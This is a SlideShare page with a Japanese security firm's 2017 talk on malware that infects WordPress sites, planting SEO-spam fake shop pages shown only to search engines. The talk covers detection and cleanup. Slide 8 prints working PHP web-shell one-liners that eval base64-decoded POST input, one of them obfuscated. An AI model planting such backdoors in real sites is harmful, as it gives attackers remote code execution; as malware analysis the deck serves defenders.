SlideShare una empresa de Scribd logo

CMSに感染するマルウェア

Descargar como PPTX, PDF
Masaki Katayama
Masaki Katayama

これで一撃! KUSANAGI x さくらのVPS用LT

Internet
1 de 10
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 1 CMSに感染するマルウェア ナビプラス株式会社 サイバーリスク研究所 片山 昌樹
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 2 プロフィール 片山 昌樹(トトロ) ・生息地:澄んだ森(フォレンジクルーム:24時間冷房) ・移動:猫バス(青いアクア) ・趣味:人を驚かすこと(メンバーもビックリ) ・お友達:真っ黒クロスケ(マルウェア)
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 3 何が起きてるの? • 昨年中旬から、多くのサイトで改ざんを確認 • 「ポイント10倍」をキーワードに、楽〇もどきや、 Yah〇〇もどきがみつかる
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 4 改ざんされた例
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 5 どうしてこうなったの? ・検索エンジンの検索BOTおよび検索エンジンに よる検索結果経由でのみ表示するWEBページを 改ざんするマルウェアが存在 ・通常のURLアクセス時は、『404 not found』 や 『白いページ』が表示されるため、気づかれにくい
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 6 マルウェア挿入方法 • wordpressやpluginの脆弱性を利用して、 複数のマルウェアがwordpressのpluginとして挿入 – /wordpress/wp-admin/load- styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp- admin,buttons&ver=4.2.2 – /wordpress/wp-admin/update.php?action=upload-plugin – /wordpress/wp-admin/load- scripts.php?c=1&load%5B%5D=hoverIntent,common,admi n-bar,svg-painter&ver=4.2.2
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 7 どうやって見つける? • Google、yahoo等で、下記キーワードで検索する 「ポイント10倍 site:検索するドメイン名」 • サイトにログインし、a.php b.php c.php 等を検索する
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 8 マルウェアの一部 <?php $mujj = $_POST['x']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("$safedg = $xsser;"); } ?> <?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['x']); ?>abcabcabc <?php eval ($_POST[1]); ?>
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 9 駆除方法 • スクラップ・アンド・ビルドを強く推奨 • Wordpress本体および使用しているpluginを最新版に 更新 • 感染しているマルウェアの除去 • 改ざんされているコンテンツを、正しいコンテンツへ差 し替え • 検索エンジンのサービス会社に対して、検索結果の 削除およびキャッシュデータの削除を依頼
Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 10 お問い合わせ先 ナビプラス株式会社 サイバーリスク研究所 navicert@naviplsu.co.jp

Recomendados

Treasure data demo.0517
Treasure data demo.0517Treasure data demo.0517
Treasure data demo.0517
BigData Sios
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
Leslie Samuel
 
データでみる機械学習と制御理論の類似点と相違点
データでみる機械学習と制御理論の類似点と相違点データでみる機械学習と制御理論の類似点と相違点
データでみる機械学習と制御理論の類似点と相違点
Ichiro Maruta
 
baserCMSテーマ制作チュートリアル
baserCMSテーマ制作チュートリアルbaserCMSテーマ制作チュートリアル
baserCMSテーマ制作チュートリアル
Ryuji Egashira
 
JAWS-UG LT AWSへの挫折と希望
JAWS-UG LT AWSへの挫折と希望JAWS-UG LT AWSへの挫折と希望
JAWS-UG LT AWSへの挫折と希望
Hajime Ogushi
 
AwsSummit 2014 LT YYY You Yacchaina Yo
AwsSummit 2014 LT YYY You Yacchaina YoAwsSummit 2014 LT YYY You Yacchaina Yo
AwsSummit 2014 LT YYY You Yacchaina Yo
Hajime Ogushi
 
Aws2013 03-15 last2
Aws2013 03-15 last2Aws2013 03-15 last2
Aws2013 03-15 last2
Hajime Ogushi
 
AWS Summit Tokyo 2015 megane LT JAWS-UG TRAIN TRAIN 栄光に向かって走って行け
AWS Summit Tokyo 2015 megane LT JAWS-UG TRAIN TRAIN 栄光に向かって走って行けAWS Summit Tokyo 2015 megane LT JAWS-UG TRAIN TRAIN 栄光に向かって走って行け
AWS Summit Tokyo 2015 megane LT JAWS-UG TRAIN TRAIN 栄光に向かって走って行け
Hajime Ogushi
 

Recomendados

Treasure data demo.0517
Treasure data demo.0517Treasure data demo.0517
Treasure data demo.0517
BigData Sios
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
Leslie Samuel
 
データでみる機械学習と制御理論の類似点と相違点
データでみる機械学習と制御理論の類似点と相違点データでみる機械学習と制御理論の類似点と相違点
データでみる機械学習と制御理論の類似点と相違点
Ichiro Maruta
 
baserCMSテーマ制作チュートリアル
baserCMSテーマ制作チュートリアルbaserCMSテーマ制作チュートリアル
baserCMSテーマ制作チュートリアル
Ryuji Egashira
 
JAWS-UG LT AWSへの挫折と希望
JAWS-UG LT AWSへの挫折と希望JAWS-UG LT AWSへの挫折と希望
JAWS-UG LT AWSへの挫折と希望
Hajime Ogushi
 
AwsSummit 2014 LT YYY You Yacchaina Yo
AwsSummit 2014 LT YYY You Yacchaina YoAwsSummit 2014 LT YYY You Yacchaina Yo
AwsSummit 2014 LT YYY You Yacchaina Yo
Hajime Ogushi
 
Aws2013 03-15 last2
Aws2013 03-15 last2Aws2013 03-15 last2
Aws2013 03-15 last2
Hajime Ogushi
 
AWS Summit Tokyo 2015 megane LT JAWS-UG TRAIN TRAIN 栄光に向かって走って行け
AWS Summit Tokyo 2015 megane LT JAWS-UG TRAIN TRAIN 栄光に向かって走って行けAWS Summit Tokyo 2015 megane LT JAWS-UG TRAIN TRAIN 栄光に向かって走って行け
AWS Summit Tokyo 2015 megane LT JAWS-UG TRAIN TRAIN 栄光に向かって走って行け
Hajime Ogushi
 
Jawsdays2016 LT BoCue3
Jawsdays2016 LT BoCue3Jawsdays2016 LT BoCue3
Jawsdays2016 LT BoCue3
Hajime Ogushi
 
最強のセキュリティでIoTを実装する方法
最強のセキュリティでIoTを実装する方法最強のセキュリティでIoTを実装する方法
最強のセキュリティでIoTを実装する方法
Shinji Saito
 
20170306 遅咲きGet Wild駆動開発しようとおもったら、Get Wildというメタルの曲がないから、You Suffer流すことにした。
20170306 遅咲きGet Wild駆動開発しようとおもったら、Get Wildというメタルの曲がないから、You Suffer流すことにした。20170306 遅咲きGet Wild駆動開発しようとおもったら、Get Wildというメタルの曲がないから、You Suffer流すことにした。
20170306 遅咲きGet Wild駆動開発しようとおもったら、Get Wildというメタルの曲がないから、You Suffer流すことにした。
Typhon 666
 
クラウドはセキュリティ的に危ないのか
クラウドはセキュリティ的に危ないのかクラウドはセキュリティ的に危ないのか
クラウドはセキュリティ的に危ないのか
Shinji Saito
 
なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...
なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...
なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...
satoru koyama
 
これからのWebセキュリティ フロントエンド編 #seccamp
これからのWebセキュリティ フロントエンド編 #seccampこれからのWebセキュリティ フロントエンド編 #seccamp
これからのWebセキュリティ フロントエンド編 #seccamp
Kyo Ago
 
Swift : クラス継承とプロトコル拡張を比べてみる #yidev
Swift : クラス継承とプロトコル拡張を比べてみる #yidevSwift : クラス継承とプロトコル拡張を比べてみる #yidev
Swift : クラス継承とプロトコル拡張を比べてみる #yidev
Tomohiro Kumagai
 
Startup Science ⑥
Startup Science ⑥Startup Science ⑥
Startup Science ⑥
Masa Tadokoro
 
Startup Science ⑤
Startup Science ⑤Startup Science ⑤
Startup Science ⑤
Masa Tadokoro
 
Startup Science ④
Startup Science ④Startup Science ④
Startup Science ④
Masa Tadokoro
 
ITエンジニアに易しいUI/UXデザイン
ITエンジニアに易しいUI/UXデザインITエンジニアに易しいUI/UXデザイン
ITエンジニアに易しいUI/UXデザイン
Roy Kim
 
Startup Science ③
Startup Science ③Startup Science ③
Startup Science ③
Masa Tadokoro
 
UXのためのUIデザイン
UXのためのUIデザインUXのためのUIデザイン
UXのためのUIデザイン
Hironobu Aoki
 
Startup Science ②
Startup Science ②Startup Science ②
Startup Science ②
Masa Tadokoro
 
UIデザインとUXの超基礎「UI Design & UX for ENGINEER」
UIデザインとUXの超基礎「UI Design & UX for ENGINEER」UIデザインとUXの超基礎「UI Design & UX for ENGINEER」
UIデザインとUXの超基礎「UI Design & UX for ENGINEER」
Kazuki Yamashita
 
UI&UX / 重要なのは、毎日さわって嬉しい UI UX!
UI&UX / 重要なのは、毎日さわって嬉しい UI UX! UI&UX / 重要なのは、毎日さわって嬉しい UI UX!
UI&UX / 重要なのは、毎日さわって嬉しい UI UX!
Akiko Ohtsuka
 
Client-Side Deep Learning
Client-Side Deep LearningClient-Side Deep Learning
Client-Side Deep Learning
Shuichi Tsutsumi
 
Startup Science ①
Startup Science ①Startup Science ①
Startup Science ①
Masa Tadokoro
 
確実に良くするUI/UX設計
確実に良くするUI/UX設計確実に良くするUI/UX設計
確実に良くするUI/UX設計
Takayuki Fukatsu
 
UXデザイン実践のために押さえておきたい大事なこと 先生:瀧 知恵美
UXデザイン実践のために押さえておきたい大事なこと 先生:瀧 知恵美UXデザイン実践のために押さえておきたい大事なこと 先生:瀧 知恵美
UXデザイン実践のために押さえておきたい大事なこと 先生:瀧 知恵美
schoowebcampus
 
グロースハック なぜ我々は無意味な施策を打ってしまうのか
グロースハック なぜ我々は無意味な施策を打ってしまうのかグロースハック なぜ我々は無意味な施策を打ってしまうのか
グロースハック なぜ我々は無意味な施策を打ってしまうのか
Yahoo!デベロッパーネットワーク
 
[POStudy]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み
[POStudy]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み[POStudy]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み
[POStudy]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み
Shigeki Morizane
 

Más contenido relacionado

Destacado

なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...
なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...
なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...
satoru koyama
 
ITエンジニアに易しいUI/UXデザイン
ITエンジニアに易しいUI/UXデザインITエンジニアに易しいUI/UXデザイン
ITエンジニアに易しいUI/UXデザイン
Roy Kim
 

Destacado (20)

Jawsdays2016 LT BoCue3
Jawsdays2016 LT BoCue3Jawsdays2016 LT BoCue3
Jawsdays2016 LT BoCue3
 
最強のセキュリティでIoTを実装する方法
最強のセキュリティでIoTを実装する方法最強のセキュリティでIoTを実装する方法
最強のセキュリティでIoTを実装する方法
 
20170306 遅咲きGet Wild駆動開発しようとおもったら、Get Wildというメタルの曲がないから、You Suffer流すことにした。
20170306 遅咲きGet Wild駆動開発しようとおもったら、Get Wildというメタルの曲がないから、You Suffer流すことにした。20170306 遅咲きGet Wild駆動開発しようとおもったら、Get Wildというメタルの曲がないから、You Suffer流すことにした。
20170306 遅咲きGet Wild駆動開発しようとおもったら、Get Wildというメタルの曲がないから、You Suffer流すことにした。
 
クラウドはセキュリティ的に危ないのか
クラウドはセキュリティ的に危ないのかクラウドはセキュリティ的に危ないのか
クラウドはセキュリティ的に危ないのか
 
なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...
なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...
なぜ情報漏洩事故は繰り返されるのか? ~当社の運用事例にみる、サイバー攻撃の実際と効果的な対策~ NTTコミュニケーションズ セキュリティ・エバンジェリス...
 
これからのWebセキュリティ フロントエンド編 #seccamp
これからのWebセキュリティ フロントエンド編 #seccampこれからのWebセキュリティ フロントエンド編 #seccamp
これからのWebセキュリティ フロントエンド編 #seccamp
 
Swift : クラス継承とプロトコル拡張を比べてみる #yidev
Swift : クラス継承とプロトコル拡張を比べてみる #yidevSwift : クラス継承とプロトコル拡張を比べてみる #yidev
Swift : クラス継承とプロトコル拡張を比べてみる #yidev
 
Startup Science ⑥
Startup Science ⑥Startup Science ⑥
Startup Science ⑥
 
Startup Science ⑤
Startup Science ⑤Startup Science ⑤
Startup Science ⑤
 
Startup Science ④
Startup Science ④Startup Science ④
Startup Science ④
 
ITエンジニアに易しいUI/UXデザイン
ITエンジニアに易しいUI/UXデザインITエンジニアに易しいUI/UXデザイン
ITエンジニアに易しいUI/UXデザイン
 
Startup Science ③
Startup Science ③Startup Science ③
Startup Science ③
 
UXのためのUIデザイン
UXのためのUIデザインUXのためのUIデザイン
UXのためのUIデザイン
 
Startup Science ②
Startup Science ②Startup Science ②
Startup Science ②
 
UIデザインとUXの超基礎「UI Design & UX for ENGINEER」
UIデザインとUXの超基礎「UI Design & UX for ENGINEER」UIデザインとUXの超基礎「UI Design & UX for ENGINEER」
UIデザインとUXの超基礎「UI Design & UX for ENGINEER」
 
UI&UX / 重要なのは、毎日さわって嬉しい UI UX!
UI&UX / 重要なのは、毎日さわって嬉しい UI UX! UI&UX / 重要なのは、毎日さわって嬉しい UI UX!
UI&UX / 重要なのは、毎日さわって嬉しい UI UX!
 
Client-Side Deep Learning
Client-Side Deep LearningClient-Side Deep Learning
Client-Side Deep Learning
 
Startup Science ①
Startup Science ①Startup Science ①
Startup Science ①
 
確実に良くするUI/UX設計
確実に良くするUI/UX設計確実に良くするUI/UX設計
確実に良くするUI/UX設計
 
UXデザイン実践のために押さえておきたい大事なこと 先生:瀧 知恵美
UXデザイン実践のために押さえておきたい大事なこと 先生:瀧 知恵美UXデザイン実践のために押さえておきたい大事なこと 先生:瀧 知恵美
UXデザイン実践のために押さえておきたい大事なこと 先生:瀧 知恵美
 

Similar a CMSに感染するマルウェア

Similar a CMSに感染するマルウェア (15)

グロースハック なぜ我々は無意味な施策を打ってしまうのか
グロースハック なぜ我々は無意味な施策を打ってしまうのかグロースハック なぜ我々は無意味な施策を打ってしまうのか
グロースハック なぜ我々は無意味な施策を打ってしまうのか
 
[POStudy]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み
[POStudy]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み[POStudy]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み
[POStudy]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み
 
Dialogflow + magellan blocksで 商品のロケーション案内するよ
Dialogflow + magellan blocksで 商品のロケーション案内するよDialogflow + magellan blocksで 商品のロケーション案内するよ
Dialogflow + magellan blocksで 商品のロケーション案内するよ
 
車の会社必見!ネジの会社は見ないでね(笑)
車の会社必見!ネジの会社は見ないでね(笑)車の会社必見!ネジの会社は見ないでね(笑)
車の会社必見!ネジの会社は見ないでね(笑)
 
[DevLOVE関西]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み
[DevLOVE関西]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み[DevLOVE関西]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み
[DevLOVE関西]大きなSIerの中で「アジャイルな開発で飯を食う」までの歩み
 
[Ridge-i] Dll講演資料 2017616
[Ridge-i] Dll講演資料 2017616[Ridge-i] Dll講演資料 2017616
[Ridge-i] Dll講演資料 2017616
 
Dll講演資料 2017616
Dll講演資料 2017616Dll講演資料 2017616
Dll講演資料 2017616
 
ソフトウエアジャパン2017 IT Forum AITC(4)
ソフトウエアジャパン2017 IT Forum AITC(4)ソフトウエアジャパン2017 IT Forum AITC(4)
ソフトウエアジャパン2017 IT Forum AITC(4)
 
Wordfes NAGOYA 2017 サービシンク名村「Webディレクターの『これから』」
Wordfes NAGOYA 2017 サービシンク名村「Webディレクターの『これから』」Wordfes NAGOYA 2017 サービシンク名村「Webディレクターの『これから』」
Wordfes NAGOYA 2017 サービシンク名村「Webディレクターの『これから』」
 
絶対にタダでは転ばない広告エンジニア #yjmu
絶対にタダでは転ばない広告エンジニア #yjmu絶対にタダでは転ばない広告エンジニア #yjmu
絶対にタダでは転ばない広告エンジニア #yjmu
 
Splunk on rancherのススメ
Splunk on rancherのススメ Splunk on rancherのススメ
Splunk on rancherのススメ
 
kintone Café HIROSHIMA Vol4-20170629v1
kintone Café HIROSHIMA Vol4-20170629v1kintone Café HIROSHIMA Vol4-20170629v1
kintone Café HIROSHIMA Vol4-20170629v1
 
ロボホンオフ会LT~アプリ開発で感じたロボホンのモーションについて~
ロボホンオフ会LT~アプリ開発で感じたロボホンのモーションについて~ロボホンオフ会LT~アプリ開発で感じたロボホンのモーションについて~
ロボホンオフ会LT~アプリ開発で感じたロボホンのモーションについて~
 
ギター、パラメトリックスピーカー、ウルトラソニックエフェクター。
ギター、パラメトリックスピーカー、ウルトラソニックエフェクター。ギター、パラメトリックスピーカー、ウルトラソニックエフェクター。
ギター、パラメトリックスピーカー、ウルトラソニックエフェクター。
 
RubyWorld Conference 2017 虎の穴ランチセッション
RubyWorld Conference 2017 虎の穴ランチセッションRubyWorld Conference 2017 虎の穴ランチセッション
RubyWorld Conference 2017 虎の穴ランチセッション
 

CMSに感染するマルウェア

  • 1. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 1 CMSに感染するマルウェア ナビプラス株式会社 サイバーリスク研究所 片山 昌樹
  • 2. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 2 プロフィール 片山 昌樹(トトロ) ・生息地:澄んだ森(フォレンジクルーム:24時間冷房) ・移動:猫バス(青いアクア) ・趣味:人を驚かすこと(メンバーもビックリ) ・お友達:真っ黒クロスケ(マルウェア)
  • 3. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 3 何が起きてるの? • 昨年中旬から、多くのサイトで改ざんを確認 • 「ポイント10倍」をキーワードに、楽〇もどきや、 Yah〇〇もどきがみつかる
  • 4. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 4 改ざんされた例
  • 5. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 5 どうしてこうなったの? ・検索エンジンの検索BOTおよび検索エンジンに よる検索結果経由でのみ表示するWEBページを 改ざんするマルウェアが存在 ・通常のURLアクセス時は、『404 not found』 や 『白いページ』が表示されるため、気づかれにくい
  • 6. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 6 マルウェア挿入方法 • wordpressやpluginの脆弱性を利用して、 複数のマルウェアがwordpressのpluginとして挿入 – /wordpress/wp-admin/load- styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp- admin,buttons&ver=4.2.2 – /wordpress/wp-admin/update.php?action=upload-plugin – /wordpress/wp-admin/load- scripts.php?c=1&load%5B%5D=hoverIntent,common,admi n-bar,svg-painter&ver=4.2.2
  • 7. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 7 どうやって見つける? • Google、yahoo等で、下記キーワードで検索する 「ポイント10倍 site:検索するドメイン名」 • サイトにログインし、a.php b.php c.php 等を検索する
  • 8. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 8 マルウェアの一部 <?php $mujj = $_POST['x']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("$safedg = $xsser;"); } ?> <?php $c=base64_decode('YXNzZXI=').$_GET['n'].'t';@$c($_POST['x']); ?>abcabcabc <?php eval ($_POST[1]); ?>
  • 9. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 9 駆除方法 • スクラップ・アンド・ビルドを強く推奨 • Wordpress本体および使用しているpluginを最新版に 更新 • 感染しているマルウェアの除去 • 改ざんされているコンテンツを、正しいコンテンツへ差 し替え • 検索エンジンのサービス会社に対して、検索結果の 削除およびキャッシュデータの削除を依頼
  • 10. Copyright © 2017 NaviPlus Co., Ltd. All rights reserved. 10 お問い合わせ先 ナビプラス株式会社 サイバーリスク研究所 navicert@naviplsu.co.jp